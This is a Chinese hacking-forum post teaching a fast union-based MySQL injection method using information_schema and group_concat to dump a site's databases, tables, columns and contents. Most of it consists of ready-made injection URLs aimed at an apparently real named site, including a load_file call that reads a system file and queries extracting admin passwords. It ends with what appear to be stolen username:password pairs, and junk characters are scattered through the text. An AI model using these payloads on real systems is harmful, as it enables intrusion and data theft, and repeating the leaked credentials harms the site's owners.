中国网络渗透测试联盟

标题: mysql注入高效方法 [打印本页]
作者: admin    时间: 2012-9-13 16:37
标题: mysql注入高效方法
此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似9 e( C; @7 L. O. T: z% e8 v) [( n+ ?$ q
但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人
0 l: d7 \. j/ _4 k( d. m& B% v
9 P6 \# `$ b6 E3 t* T8 E" w7 e0 Z& K
优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入# q- N% q' `+ y( n/ K
9 _' v' \6 W4 Z2 v3 h/ I$ i4 u/ u8 ^' ?
缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...
; M+ R5 s1 S- r! t
8 l% x0 d/ ^9 l$ N2 S& `7 Q下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示2 ?5 n) h. c  a
在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ ,  + 等等) z$ n7 d( R; G! ?: N1 i7 X" M/ z- p
* i  [- v+ j' V8 Y( p; s) p
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17
" M+ U( ~* g1 N5 J- }0 ^1 {5 Q8 G! \
读出所有库:- n8 E0 f' J$ `( L2 |( \% x  J+ S
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA
# U- h7 b7 ~$ @# j/ {7 @
3 Y, Y( S& y2 i8 P0 d' L7 E* a) V! L0 u4 m

; ^& J# V% T- p6 ?% g& U读出所有表:8 ^' k+ [4 x2 e1 p; S" w* `% ^) A
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()
. t7 X- C. d% {( z' D; B: O* W* A0 s7 L/ F9 U# q4 ]
读出所有表字段:; ~, U) G8 x6 q2 [* V( d7 J& w
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)
, t! ]9 ~6 S8 Y7 x; W*/ (97,100,109,105,110)为admin的ascii码 依次类推0 J! c: t; D, I" c3 ?

2 ]8 q* X/ O- s6 R" h* `, z% k% U6 C* b读出所有表字段里的内容:
0 u* }  b% c0 Zhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin
% i8 w, N. q- _/ G% `. b6 R) @' C! ?
% _2 q5 Z4 I0 u9 ]! L! O

+ A* M# M+ H3 p2 \; I& J( j) W3 o. a3 U+ `

, A0 ^9 f: g2 q' s% Z; r
: C  q! Y3 {; P7 V. Bhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23
) r$ f- {# o/ C4 J5 l4 \1 n
4 j  g6 a3 i/ w: r8 B+ E+ c/ H/ N  H, N) D& c
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%231 J- a; c5 i% j: R  ^6 x! y

: N0 I1 H: S7 k0 |# lhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23
/ `0 m9 x  V( f  f7 v5 D  f, c! o2 b3 U5 H' W; j' w
& w) h1 d4 j. e* Q  a3 B& q
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23
' D( {% q) u0 O) W9 V3 M
! J$ _+ y/ Y" z/ e# G; ]# j% E8 a
        webmaster:dzb521123,simlab:simadmin20043233( U+ W/ h4 t( V$ B2 X% t$ M  T




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2